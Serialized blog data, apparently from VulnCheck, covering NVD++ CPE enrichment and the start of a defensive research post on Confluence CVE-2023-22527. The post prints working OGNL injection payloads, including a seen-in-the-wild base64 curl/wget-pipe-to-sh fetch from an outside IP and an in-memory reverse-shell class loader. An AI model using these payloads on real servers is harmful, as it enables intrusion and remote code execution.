weeks ago, we introduced ",[47,73749,73751],{"href":72066,"rel":73750},[51],"VulnCheck CPE enrichment"," to support the security community while the National Vulnerability Database (NVD) has experienced delays in processing new vulnerabilities. CPE generation is crucial for vulnerability tools and security teams, facilitating the mapping of software vulnerabilities (CVEs) to products.",[18,73754,73755],{},"Since the launch of NVD++ with CPE enrichment three weeks ago, we've received numerous inquiries about VulnCheck CPE.",[61,73757,73759],{"id":73758},"q-are-you-truly-providing-cpe-to-the-community-at-no-cost","Q: Are you truly providing CPE to the community at no cost?",[18,73761,73762,73765],{},[295,73763,73764],{},"A:"," Yes, we are offering VulnCheck CPE enrichment as a community service, free of charge for organizations. As a commitment to the security community, we consider CPE a vital function and have decided to include it in both our community service NVD++ and our commercial service VulnCheck NVD.",[61,73767,73769],{"id":73768},"q-what-is-vulnchecks-cpe-coverage","Q: What is VulnCheck’s CPE coverage?",[18,73771,73772,73774],{},[295,73773,73764],{}," Our efforts have been concentrated on maximizing CPE coverage for mainstream vendors and products. Currently, we maintain 100% coverage of 46 CVE Numbering Authorities (CNAs) and generate CPE for 117 out of 181 CNAs. To provide better visibility into our coverage, we've created a data visualization tool.",[18,73776,73777],{},[68,73778],{":width":10862,"alt":73779,"src":73780},"VulnCheck NVD++ CPE","\u002Fblog\u002Fnvd-cpe-update\u002FVulnCheck-CPE-Coverage.png",[61,73782,73784],{"id":73783},"q-how-can-i-access-vulncheck-cpe-enrichment","Q: How can I access VulnCheck CPE Enrichment?",[18,73786,73787,73789,73790,73793,73794,59],{},[295,73788,73764],{}," VulnCheck CPE enrichment is accessible when you join the VulnCheck Community. 
You can sign up for a free community account ",[47,73791,305],{"href":40745,"rel":73792},[51],". Our documentation outlines how to access VulnCheck CPE ",[47,73795,305],{"href":73796,"rel":73797},"https:\u002F\u002Fdocs.vulncheck.com\u002Fcommunity\u002Fnist-nvd\u002Fschema",[51],[18,73799,73800],{},"Additionally, we've created a video to provide a guided walkthrough on accessing VulnCheck CPE enrichment.",[59905,73802],{"width":73803,"height":73804,"src":73805,"title":59911,"frameBorder":445,"allow":59907,"referrerPolicy":59909,"allowFullScreen":237},840,472.5,"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FmcWwqmxUrv8?si=W6fB3tC3xbq6HE2S",[18,73807,73808,73809],{},"We are actively working on expanding our automated CPE generation and refining accuracy in response to the NVD pause. If you have feedback or questions, please email us at ",[47,73810,73812],{"href":73811},"mailto:community@vulncheck.com","community@vulncheck.com",[18,73814,73815],{},"VulnCheck NVD++ provides the security community with a dependable alternative for maintaining a persistent connection to NIST NVD CVE data, empowering users with seamless and reliable access to this critical public resource.",[18,73817,73818,73819],{},"To learn more about VulnCheck NVD++, please visit: ",[47,73820,40670],{"href":40670,"rel":73821},[51],[61,73823,202],{"id":201},[18,73825,73826,73827,217],{},"Are you interested in exploring threat actors? Do you want to track the vulnerabilities they are exploiting in the wild? 
If so, VulnCheck's ",[47,73828,216],{"href":214,"rel":73829},[51],{"title":219,"searchDepth":220,"depth":220,"links":73831},[73832,73833,73834,73835],{"id":73758,"depth":220,"text":73759},{"id":73768,"depth":220,"text":73769},{"id":73783,"depth":220,"text":73784},{"id":201,"depth":220,"text":202},"2024-04-15","To help close the enrichment gap for CVEs in the “Awaiting Analysis\" status, VulnCheck generates CPEs from reliable sources and has made them available through our NVD++ service as “vcConfigurations”.",{"slug":73839},"nvd-cpe-update","\u002Fblog\u002Fnvd-cpe-update",{"title":73740,"description":73837},"blog\u002Fnvd-cpe-update",[33173],"5Lb36k7XES0sS0k-Mc_In5VSlw4GhTOauOEqFfFEzaY",{"id":73846,"title":73847,"articles":7,"authors":73848,"body":73850,"date":73968,"description":73969,"extension":234,"image":7,"link":7,"meta":73970,"navigation":237,"path":73972,"seo":73973,"series":7,"stem":73974,"subtype":7,"tags":73975,"__hash__":73976},"blog\u002Fblog\u002Fnvd-cpe.md","Enhancing Access to NIST NVD data... Introducing CPE Enrichment in VulnCheck NVD++",[73849],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73851,"toc":73960},[73852,73857,73860,73864,73867,73870,73874,73877,73891,73895,73898,73901,73904,73908,73911,73922,73929,73932,73936,73939,73942,73946,73948,73953,73955],[18,73853,73854],{},[68,73855],{":width":10862,"alt":73779,"src":73856},"\u002Fblog\u002Fnvd-cpe\u002Fnvd-cpe.png",[18,73858,73859],{},"The National Vulnerability Database (NVD) is a crucial resource to the cybersecurity community, offering vital insights into vulnerabilities pinpointed through the Common Vulnerabilities and Exposures (CVE) program. Yet, recent changes at the National Institute of Standards and Technology (NIST) have hindered the timely processing of CVE data and the inclusion of essential enrichment, resulting in a discernible gap. 
This has spurred a collaborative endeavor to address the issue, ensuring the seamless continuation of vulnerability management efforts.",[61,73861,73863],{"id":73862},"the-rise-and-pause-of-nvd-a-turning-point","The Rise and Pause of NVD: A Turning Point",[18,73865,73866],{},"Over the last decade, the CVE program has seen a consistent increase in reported vulnerabilities annually. The NIST NVD's primary objective is to collect, refine, enhance, and disseminate information on all disclosed CVEs as a public service. The surge in volume has necessitated a corresponding expansion in NIST's operational capabilities to ensure analysis occurs at the required speed for response by vulnerability management and security teams. In particular, the analysis produces CVE enrichment including vulnerable configurations with CPEs, CVSS scores\u002Fmetrics, CWE classifications, and Reference citations.",[18,73868,73869],{},"However, the unexpected pause in NVD's operations for CVE analysis and enrichment is causing concern in the cybersecurity community, jeopardizing many established processes and workflows for vulnerability management and response. What was once a reliable source of vulnerability data has recently lapsed in its pace of publication, leaving organizations struggling to find a replacement.",[61,73871,73873],{"id":73872},"key-enrichment-data","Key Enrichment Data",[18,73875,73876],{},"The pause in NVD's operations has delayed the addition of several types of vulnerability enrichment, creating a growing backlog of newly disclosed CVEs that linger in the AWAITING ANALYSIS status:",[22,73878,73879,73882,73885,73888],{},[25,73880,73881],{},"Common Vulnerability Scoring System (CVSS) Metrics\u002FScoring: The universal baseline for quantitatively measuring vulnerability Severity. 
This is the essential starting point for calculating temporal scores and other more advanced methods for prioritizing vulnerabilities.",[25,73883,73884],{},"Common Platform Enumeration (CPE) : The globally accepted method of declaring which vendors, products, versions, builds, hotfixes and affected platforms are affected by  a given CVE expressed as “Known Affected Software Configurations”.  Without this essential information, detecting and measuring exposure to known vulnerabilities is impossible.",[25,73886,73887],{},"References: URLs provided as supplemental information, offering additional context and insights into a CVE, including Vendor advisories and fix notifications, known exploit methods and POCs, media coverage and technical briefs. These enable practitioners to classify vulnerabilities and  make informed decisions about priority and response..",[25,73889,73890],{},"Common Weakness Enumeration (CWE): Abstracts the vulnerability’s  underlying weaknesses, helping with categorization, impact analysis, association with CAPEC and Mitre ATT&CK techniques, aiding analysis and mitigation..",[61,73892,73894],{"id":73893},"stepping-up-vulnchecks-response","Stepping Up: VulnCheck's Response",[18,73896,73897],{},"VulnCheck has emerged as a widely recognized source of community-accessible vulnerability intelligence, and is dedicated to ensuring publicly available information about known vulnerabilities is available to all.  As part of this commitment, VulnCheck launched NVD++ on March 13, 2024, a Community-accessible service providing timely access to NIST NVD data, ensuring uninterrupted support for vulnerability management efforts.",[18,73899,73900],{},"To help close the enrichment gap for CVEs in the “Awaiting Analysis’ status,\nVulnCheck prioritized the generation of CPEs from reliable sources and has started adding them into the JSON available through our NVD++ service as “vcConfigurations”. 
Our initial release closes the gap by close to half of the current CVEs missing critical CPE data, starting with the majority of the highest prevalence vendors and products where vulnerability management teams lack the data to measure local exposure.",[18,73902,73903],{},"Our research team is investigating additional sources and prioritizing accuracy over quick coverage to expand CPE correlation in the coming weeks.",[61,73905,73907],{"id":73906},"how-to-use-vulncheck-cpe","How to use VulnCheck CPE",[18,73909,73910],{},"The CPE data is represented as \"vcConfigurations\" and in a distinct CPE list in \"vulnerableCPEs\", in the following VulnCheck API indexes:",[22,73912,73913,73916,73919],{},[25,73914,73915],{},"nist-nvd2 - NVD 2.0 format, including essential data available to the VulnCheck Community tier",[25,73917,73918],{},"nist-nvd - NVD 1.0 format, including essential data available to the VulnCheck Community tier",[25,73920,73921],{},"VulnCheck-nvd2 - NVD 2.0 format, including premier Vulnerability & Exploit Intelligence available to VulnCheck customers",[18,73923,73924,73925],{},"Example CPE Data:\n",[68,73926],{":width":10862,"alt":73927,"src":73928},"VulnCheck CPE Example","\u002Fblog\u002Fnvd-cpe\u002Fvulncheck-cpe.png",[18,73930,73931],{},"The CPE data is available for both community NVD++ and Commercial feeds.  We only ask that Community user’s provide attribution to VulnCheck when our CPE data is used within another product or service.",[61,73933,73935],{"id":73934},"vulncheck-cpe-coverage","VulnCheck CPE coverage",[18,73937,73938],{},"All the vendor \u002F product \u002F version information we harvest is CNA provided via Mitre 5.0. All the cpe are based off of CNA provided cpe or cpe we found that matched the vendor \u002F product in NVD. 
We also do cpe unrolling (where possible), which we think is a big deal.",[18,73940,73941],{},"At the time of publishing this post, VulnCheck’s CPE data covers 20% of CVEs across the full NVD, and 40% of CVEs awaiting coverage, and we will continue to improve on these numbers as we expand our CPE coverage.",[18,73943,73944],{},[68,73945],{":width":10862,"alt":73779,"src":73856},[18,73947,73815],{},[18,73949,73818,73950],{},[47,73951,40670],{"href":40670,"rel":73952},[51],[61,73954,202],{"id":201},[18,73956,73826,73957,217],{},[47,73958,216],{"href":214,"rel":73959},[51],{"title":219,"searchDepth":220,"depth":220,"links":73961},[73962,73963,73964,73965,73966,73967],{"id":73862,"depth":220,"text":73863},{"id":73872,"depth":220,"text":73873},{"id":73893,"depth":220,"text":73894},{"id":73906,"depth":220,"text":73907},{"id":73934,"depth":220,"text":73935},{"id":201,"depth":220,"text":202},"2024-03-25","To help close the enrichment gap for CVEs in the “Awaiting Analysis” status, VulnCheck prioritized the generation of CPEs from reliable sources and has started adding them into the JSON available through our NVD++ service as “vcConfigurations”.",{"slug":73971},"nvd-cpe","\u002Fblog\u002Fnvd-cpe",{"title":73847,"description":73969},"blog\u002Fnvd-cpe",[33173],"27M_pHx-4KUTjw5IJW1m3D7KGezjL4CmacdwcIjDo3U",{"id":73978,"title":73979,"articles":7,"authors":73980,"body":73982,"date":74091,"description":73992,"extension":234,"image":7,"link":7,"meta":74092,"navigation":237,"path":74094,"seo":74095,"series":7,"stem":74096,"subtype":7,"tags":74097,"__hash__":74098},"blog\u002Fblog\u002Fnvd-plus-plus.md","Enhancing Access to NIST NVD data... 
Introducing VulnCheck NVD++",[73981],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":73983,"toc":74085},[73984,73990,73993,73997,74003,74009,74015,74022,74028,74034,74038,74041,74046,74050,74053,74059,74065,74071,74073,74078,74080],[18,73985,73986],{},[68,73987],{":width":10862,"alt":73988,"src":73989},"NVD Gap","\u002Fblog\u002Fnvd-plus-plus\u002Fnvd-gap.png",[18,73991,73992],{},"Given the security community's ongoing concerns about the reliability, rate limits, and performance of NIST's National Vulnerability Database (NVD) 2.0 API, we recognized a growing need to address these challenges.",[61,73994,73996],{"id":73995},"top-challenges-with-nist-nvd","Top Challenges with NIST NVD",[18,73998,73999,74002],{},[295,74000,74001],{},"Reliability:"," Users often encounter issues with the NIST NVD API finding it slow and often unresponsive, leading to delays in accessing critical CVE data. This necessitates troubleshooting or waiting for resolution.",[43656,74004,74006],{":position":7055,"author":74005},"Enterprise Security Architect",[18,74007,74008],{},"I've had to code delays into my scripts to handle timeouts and 503 errors.",[18,74010,74011,74014],{},[295,74012,74013],{},"Rate Limits:"," The NIST NVD API imposes strict rate limits on queries, requiring users to wait between requests, which significantly extends downloads and processing times.",[18,74016,74017,74021],{},[68,74018],{":width":10862,"alt":74019,"src":74020},"NIST NVD Rate Limits","\u002Fblog\u002Fnvd-plus-plus\u002Fnvd-rate-limits.png","\n(Source: NIST NVD)",[43656,74023,74025],{":position":7055,"author":74024},"Frustrated Security Researcher",[18,74026,74027],{},"They require a 6-second delay between requests, causing unnecessary delays in my scripts.",[18,74029,74030,74033],{},[295,74031,74032],{},"Lack of Recent Enrichment:"," The NVD’s pause of CVE data enrichment affects the incorporation of new CVEs into CPE, NIST CWE, and NIST CVSS scoring 
systems.",[61,74035,74037],{"id":74036},"addressing-the-top-challenges-with-nist-nvd","Addressing the Top Challenges with NIST NVD",[18,74039,74040],{},"To address these issues, we are excited to introduce VulnCheck NVD++, a free community resource that aims to mitigate the limitations of the NIST NVD API.",[18,74042,74043],{},[68,74044],{":width":10862,"alt":73988,"src":74045},"\u002Fblog\u002Fnvd-plus-plus\u002Fvulncheck-nvd-2.png",[61,74047,74049],{"id":74048},"how-vulncheck-nvd-resolves-the-limitations-of-the-nist-nvd-api","How VulnCheck NVD++ Resolves The Limitations of the NIST NVD API?",[18,74051,74052],{},"VulnCheck NVD++ solves for the challenges of using the NIST NVD API by providing reliable  access to NVD 1.0 and 2.0 through NVD++ that is available at machine speeds as a community service. We are delivering this solution to offload some of the burden that NIST NVD faces, ensuring more accessible and timely access to this critical infrastructure.",[18,74054,74055,74058],{},[295,74056,74057],{},"Enhanced Reliability:"," VulnCheck APIs are engineered for high availability, performance and stability, ensuring stable and reliable access to NIST NVD data. Users can retrieve NVD data without encountering reliability issues, alleviating the need for tuning and troubleshooting.",[18,74060,74061,74064],{},[295,74062,74063],{},"Elimination of API Rate Limits:"," VulnCheck API removes the barriers of archaic rate limits, enabling users to access NVD data at their preferred speed without restrictions or introducing artificial delays.",[18,74066,74067,74070],{},[295,74068,74069],{},"NVD Data Enrichment:"," While the NVD has paused CVE data enrichment, we are actively exploring solutions to help fill this enrichment gap and will have some exciting new community updates coming very soon... 
So stay tuned!",[18,74072,73815],{},[18,74074,73818,74075],{},[47,74076,40670],{"href":40670,"rel":74077},[51],[61,74079,202],{"id":201},[18,74081,73826,74082,217],{},[47,74083,216],{"href":214,"rel":74084},[51],{"title":219,"searchDepth":220,"depth":220,"links":74086},[74087,74088,74089,74090],{"id":73995,"depth":220,"text":73996},{"id":74036,"depth":220,"text":74037},{"id":74048,"depth":220,"text":74049},{"id":201,"depth":220,"text":202},"2024-03-14",{"slug":74093},"nvd-plus-plus","\u002Fblog\u002Fnvd-plus-plus",{"title":73979,"description":73992},"blog\u002Fnvd-plus-plus",[33173],"s4BO8da_9UKeD2AYkwyhJlBrFGBTJPYrOu0u_XE9dmk",{"id":74100,"title":22211,"articles":74101,"authors":74122,"body":74124,"date":74105,"description":76687,"extension":234,"image":7,"link":7,"meta":76688,"navigation":237,"path":76690,"seo":76691,"series":7,"stem":76692,"subtype":7,"tags":7,"__hash__":76693},"blog\u002Fblog\u002Fconfluence-dreams-of-shells.md",[74102,74106,74111,74114,74117],{"title":74103,"source":11218,"link":74104,"date":74105},"Stealth Bomber: Atlassian Confluence Exploits Drop Web Shells In-Memory","https:\u002F\u002Fwww.darkreading.com\u002Fapplication-security\u002Fstealth-bomber-atlassian-confluence-exploits-drop-web-shells-in-memory","2024-03-08",{"title":74107,"source":74108,"link":74109,"date":74110},"VulnRecap 3\u002F11\u002F24 – JetBrains & Atlassian Issues Persist","eSecurity Planet","https:\u002F\u002Fwww.esecurityplanet.com\u002Fthreats\u002Fvulnerability-recap-march-11-2024\u002F","2024-03-11",{"title":74112,"source":61436,"link":74113,"date":74110},"Risky Biz News: The aftermath of Microsoft's SVR hack is rearing its ugly head","https:\u002F\u002Fnews.risky.biz\u002Frisky-biz-news-the-aftermath-of-microsofts-svr-hack-is-rearing-its-ugly-head\u002F?ref=risky-business-news-newsletter",{"title":74115,"source":14382,"link":74116,"date":74110},"BianLian Threat Actors Exploiting JetBrains TeamCity Flaws in Ransomware 
Attacks","https:\u002F\u002Fthehackernews.com\u002F2024\u002F03\u002Fbianlian-threat-actors-exploiting.html",{"title":74118,"source":74119,"link":74120,"date":74121},"Printers Are “Not Nice” – PSW #820","Paul's Security Weekly Podcast","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002F12490-printers-are-not-nice-psw-820","2024-03-13",[74123],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":74125,"toc":76676},[74126,74129,74131,74154,74162,74168,74175,74182,74189,74198,74205,74213,74220,74227,74230,74234,74243,74261,74298,74301,74305,74328,74389,74397,74406,74413,74445,74455,74462,74471,74477,74669,74687,74693,74701,74708,74714,74728,74734,74737,74741,74752,74768,74783,74999,75017,75022,75029,75049,75056,75436,75449,75623,75636,75662,75672,75678,75684,75692,75696,75705,75730,75737,75744,75974,75978,75981,75987,75997,76003,76006,76334,76337,76625,76628,76630,76651,76653,76662,76673],[263,74127],{":list":74128,"ico":266,"title":22211},"[\"VulnCheck published three proof of concept exploits that can execute arbitrary code within Confluence without touching the filesystem.\",\"There are pre-existing public exploits that use similar techniques to load the infamous Godzilla webshell, and they appear to have been used in the wild.\",\"VulnCheck shares detections and indicators of compromise to aid defenders.\"]",[61,74130,11648],{"id":11647},[18,74132,74133,74134,74139,74140,74143,74144,982,74148,74153],{},"Since its disclosure on ",[47,74135,74138],{"href":74136,"rel":74137},"https:\u002F\u002Fconfluence.atlassian.com\u002Fsecurity\u002Fcve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html",[51],"January 16",", CVE-2023-22527 has been a hotbed of malicious activity. 
The vulnerability was quickly added to ",[47,74141,1233],{"href":69377,"rel":74142},[51]," on January 21, CISA KEV on January 24, and reports of exploitation have continued through February (see ",[47,74145,33465],{"href":74146,"rel":74147},"https:\u002F\u002Fwww.rapid7.com\u002Fblog\u002Fpost\u002F2024\u002F02\u002F15\u002Frce-to-sliver-ir-tales-from-the-field\u002F",[51],[47,74149,74152],{"href":74150,"rel":74151},"https:\u002F\u002Fwww.imperva.com\u002Fblog\u002Fattackers-quick-to-weaponize-cve-2023-22527-for-malware-delivery\u002F",[51],"Imperva",". Not to be outdone, the exploit development community has been busy as well. VulnCheck currently tracks 30 unique exploits for the vulnerability.",[18,74155,74156,74157,74161],{},"Many of the exploits we track are largely the same (a phenomenon we’ve touched on ",[47,74158,36132],{"href":74159,"rel":74160},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fnew-cve-2022-1388",[51],"). Consider the following exploit payloads for CVE-2023-22527:",[18,74163,74164,4606],{},[47,74165,22175],{"href":74166,"rel":74167},"https:\u002F\u002Fraw.githubusercontent.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fmain\u002Fhttp\u002Fcves\u002F2023\u002FCVE-2023-22527.yaml",[51],[1925,74169,74170],{},[18,74171,74172],{},[886,74173,74174],{},"label=aaa\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027 &poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader( \\u0027x_vuln_check\\u0027,(new+freemarker.template.utility.Execute()).exec({\"whoami\"}))",[18,74176,74177,74181],{},[47,74178,36852],{"href":74179,"rel":74180},"https:\u002F\u002Fraw.githubusercontent.com\u002Frapid7\u002Fmetasploit-framework\u002Fmaster\u002Fmodules\u002Fexploits\u002Fmulti\u002Fhttp\u002Fatlassian_confluence_rce_cve_2023_22527.rb",[51]," (Windows Variant - immediately blocked by 
Defender):",[1925,74183,74184],{},[18,74185,74186],{},[886,74187,74188],{},"label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.YDwnBTJF,{})+\\u0027&YDwnBTJF=(new freemarker.template.utility.Execute()).exec({ @org.apache.struts2.ServletActionContext@getRequest().getParameter('PeMYYOlk')})& PeMYYOlk=cmd.exe \u002Fc \"powershell.exe -nop -w hidden -noni -c “...",[18,74190,74191,74192,74197],{},"A payload from the wild as reported by ",[47,74193,74196],{"href":74194,"rel":74195},"https:\u002F\u002Fisc.sans.edu\u002Fdiary\u002Frss\u002F30576",[51],"Johannes Ullrich"," SANS Blog:",[1925,74199,74200],{},[18,74201,74202],{},[886,74203,74204],{},"label=\\\\u0027%2b#request\\\\u005b\\\\u0027.KEY_velocity.struts2.context\\\\u0027\\\\u005d.internalGet( \\\\u0027ognl\\\\u0027).findValue(#parameters.x,{})%2b\\\\u0027&x=(new freemarker.template.utility.Execute()).exec({ \"echo -n Y3VybCAtcyBodHRwOi8vMTk1LjIxMS4xMjQuMTg0L2FhIHx8IHdnZXQgLXEgLU8tIGh0dHA6Ly8xOTUuMjExLjEyNC4xODQvYWE= | base64 -d | sh\"})",[18,74206,74207,74208,74212],{},"A ",[47,74209,2485],{"href":74210,"rel":74211},"https:\u002F\u002Fgithub.com\u002FManh130902\u002FCVE-2023-22527-POC\u002F",[51]," example:",[1925,74214,74215],{},[18,74216,74217],{},[886,74218,74219],{},"label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet( \\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027& x=@org.apache.struts2.ServletActionContext@getResponse().setHeader( 'X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({'\"+ cmd +\"'}))",[18,74221,74222,74223,74226],{},"What all these exploits have in common is that they use ",[886,74224,74225],{},"freemarker.template.utility.Execute"," to execute an operating system command. 
Which, you’ll know if you ever try to throw the Metasploit Windows payload, is a great way to get caught and subsequently blocked by endpoint detection.",[18,74228,74229],{},"Dear attacker, all is not lost. Loading into and executing code from Confluence’s memory works like a dream. Due to the magic of OGNL and Java reflection, there is no limit to what you can do.",[61,74231,74233],{"id":74232},"dreaming-of-shells","Dreaming of Shells",[18,74235,74236,74237,74242],{},"Originally, we approached this “execute out of memory” problem using ",[47,74238,74241],{"href":74239,"rel":74240},"https:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FNashorn_(JavaScript_engine)",[51],"Nashorn",". While that worked (and we’ll discuss it later in the blog), there is a significantly better approach.",[18,74244,74245,74246,74250,74251,74255,74256,74260],{},"During VulnCheck’s standard GitHub exploit review for ",[47,74247,22289],{"href":74248,"rel":74249},"https:\u002F\u002Fvulncheck.com\u002Fxdb",[51],", we stumbled upon this ",[47,74252,22188],{"href":74253,"rel":74254},"https:\u002F\u002Fraw.githubusercontent.com\u002FBoogipop\u002FCVE-2023-22527-Godzilla-MEMSHELL\u002Fmain\u002Fsrc\u002Fmain\u002FMain.java",[51]," that exploits CVE-2023-22527 to load the ",[47,74257,74259],{"href":22192,"rel":74258},[51],"Godzilla webshell"," into memory. It contains at least three novel techniques that we weren’t aware of:",[1789,74262,74263,74275,74284],{},[25,74264,74265,74266,982,74270,74274],{},"It alters the max length of an OGNL expression to overcome space issues in CVE-2023-22527 exploitation. By default, Confluence appears to restrict expressions to 200 characters. 
Both ",[47,74267,61007],{"href":74268,"rel":74269},"https:\u002F\u002Fblog.projectdiscovery.io\u002Fatlassian-confluence-ssti-remote-code-execution\u002F",[51],[47,74271,33465],{"href":74272,"rel":74273},"https:\u002F\u002Fattackerkb.com\u002Fassessments\u002Ff4db997d-7a6a-4670-8c3a-0f660db486d4",[51]," shared different work-arounds for this limitation, but this new method completely removes the restriction.",[25,74276,74277,74278,74283],{},"The exploit uses ",[47,74279,74282],{"href":74280,"rel":74281},"https:\u002F\u002Fdocs.spring.io\u002Fspring-framework\u002Fdocs\u002Fcurrent\u002Fjavadoc-api\u002Forg\u002Fspringframework\u002Fcglib\u002Fcore\u002FReflectUtils.html",[51],"org.springframework.cglib.core.ReflectUtils.defineClass()"," to load a class into memory from a byte string.",[25,74285,74286,74287,74292,74293,74297],{},"The loaded class is a ",[47,74288,74291],{"href":74289,"rel":74290},"https:\u002F\u002Ftomcat.apache.org\u002Ftomcat-7.0-doc\u002Fservletapi\u002Findex.html?javax\u002Fservlet\u002FServletRequestListener.html",[51],"ServletRequestListener"," and registers to receive ",[47,74294,74296],{"href":74289,"rel":74295},[51],"ServletRequestEvents",". Meaning the uploaded class can intercept all HTTP requests to Confluence.",[18,74299,74300],{},"These three clever ideas combine to create a very powerful in-memory webshell. In the following sections, we’ll examine each step closer and then look at detection artifacts.",[993,74302,74304],{"id":74303},"loading-a-class-into-memory","Loading a Class Into Memory",[18,74306,74307,74308,74312,74313,1554,74316,74319,74320,74324,74325,4606],{},"To demonstrate using CVE-2023-22527 to load a class into memory, we’ve published a proof of concept on ",[47,74309,2485],{"href":74310,"rel":74311},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fcve-2023-22527\u002Ftree\u002Fmain\u002Freverseshell",[51],". 
If you look at the PoC, you’ll notice there are no ",[886,74314,74315],{},".java",[886,74317,74318],{},".class"," files. The class the exploit loads is a reverse shell generated by the ",[47,74321,20558],{"href":74322,"rel":74323},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Fblob\u002F919a2aa0d57f396e70811bf349d10e5504be7987\u002Fjava\u002Fjavaclass.go#L33",[51]," framework. This is done simply by invoking the following ",[886,74326,74327],{},"java.ReverseShellBytecode",[1354,74329,74331],{"className":19022,"code":74330,"language":19024,"meta":219,"style":219},"func sendShell(conf *config.Config) bool {\n   \u002F\u002F generate the class that Confluence will execute in memory\n   reverseShell, className := java.ReverseShellBytecode(conf)\n",[886,74332,74333,74358,74363],{"__ignoreMap":219},[1373,74334,74335,74337,74340,74342,74344,74346,74348,74350,74352,74354,74356],{"class":1375,"line":1376},[1373,74336,19088],{"class":1397},[1373,74338,74339],{"class":7297}," sendShell",[1373,74341,1384],{"class":1383},[1373,74343,38107],{"class":19096},[1373,74345,19113],{"class":1397},[1373,74347,38112],{"class":14938},[1373,74349,59],{"class":1383},[1373,74351,38117],{"class":14938},[1373,74353,2230],{"class":1383},[1373,74355,16303],{"class":7293},[1373,74357,4765],{"class":1383},[1373,74359,74360],{"class":1375,"line":220},[1373,74361,74362],{"class":4630},"   \u002F\u002F generate the class that Confluence will execute in memory\n",[1373,74364,74365,74368,74370,74373,74375,74378,74380,74383,74385,74387],{"class":1375,"line":1266},[1373,74366,74367],{"class":4640},"   reverseShell",[1373,74369,5437],{"class":1383},[1373,74371,74372],{"class":4640}," className ",[1373,74374,20584],{"class":1397},[1373,74376,74377],{"class":4640}," 
java",[1373,74379,59],{"class":1383},[1373,74381,74382],{"class":7297},"ReverseShellBytecode",[1373,74384,1384],{"class":1383},[1373,74386,38107],{"class":4640},[1373,74388,11875],{"class":1383},[18,74390,74391,74392,74396],{},"The reverse shell automatically works on Windows or Linux (see ",[47,74393,43556],{"href":74394,"rel":74395},"https:\u002F\u002Fgist.github.com\u002Fj-baines\u002F38eb6d16eed64986a369f7f981f57508",[51],"), which is useful because Confluence can be deployed on either operating system.",[18,74398,74399,74400,74405],{},"The problem with the generated class is that it’s much too large for the 200-character OGNL expression limit. The simplest solution is to disable this limit. Using the static function ",[47,74401,74404],{"href":74402,"rel":74403},"https:\u002F\u002Fjavadoc.io\u002Fdoc\u002Fognl\u002Fognl\u002Flatest\u002Findex.html",[51],"ognl.Ognl.applyExpressionMaxLength",", the caller can lift the size restriction high enough to accommodate loading the reverse shell class. The following CVE-2023-22527 exploit lifts the expression limit to 100,000 characters.",[1925,74407,74408],{},[18,74409,74410],{},[886,74411,74412],{},"label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.Fvp,{})+\\u0027&Fvp=@ognl.Ognl@applyExpressionMaxLength(100000)",[18,74414,74415,74416,31814,74419,74421,74422,74425,74426,74429,74430,74435,74436,74441,74442,59],{},"Having done that, the attacker is free to load the class. 
This can be done using Spring’s static ",[886,74417,74418],{},"org.springframework.cglib.core.ReflectUtils.defineClass(String className, byte[] b, ClassLoader loader)",[886,74420,13590],{}," is a random string, ",[886,74423,74424],{},"b"," is the reverse shell, and ",[886,74427,74428],{},"loader"," is the ",[47,74431,74434],{"href":74432,"rel":74433},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fapi\u002Fjava\u002Flang\u002FThread.html#currentThread--",[51],"current thread","’s ",[47,74437,74440],{"href":74438,"rel":74439},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase%2F7%2Fdocs%2Fapi%2F%2F\u002Fjava\u002Flang\u002FThread.html#getContextClassLoader()",[51],"class loader"," via ",[886,74443,74444],{},"currentThread().getContextClassLoader()",[18,74446,74447,74448,74451,74452,31686],{},"As a CVE-2023-22527 exploit, that looks like the following (note, in the following, the class is sent over the wire Base64 encoded and ",[886,74449,74450],{},"Base64Utils.decodeFromString"," is invoked to decode it before passing it to ",[886,74453,74454],{},"defineClass",[1925,74456,74457],{},[18,74458,74459],{},[886,74460,74461],{},"VjI=(@org.springframework.cglib.core.ReflectUtils@defineClass( 'DpLlaMWFG',@org.springframework.util.Base64Utils@decodeFromString('classBytes…'), @java.lang.Thread@currentThread().getContextClassLoader())).newInstance()& label=\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet( \\u0027ognl\\u0027).findValue(#parameters.VjI,{})+\\u0027",[18,74463,74464,74465,74470],{},"The transition from the OGNL expression to executing the loaded class is the invocation of ",[47,74466,74469],{"href":74467,"rel":74468},"https:\u002F\u002Fdocs.oracle.com\u002Fjavase\u002F8\u002Fdocs\u002Fapi\u002Fjava\u002Flang\u002FClass.html#newInstance--",[51],"newInstance",". 
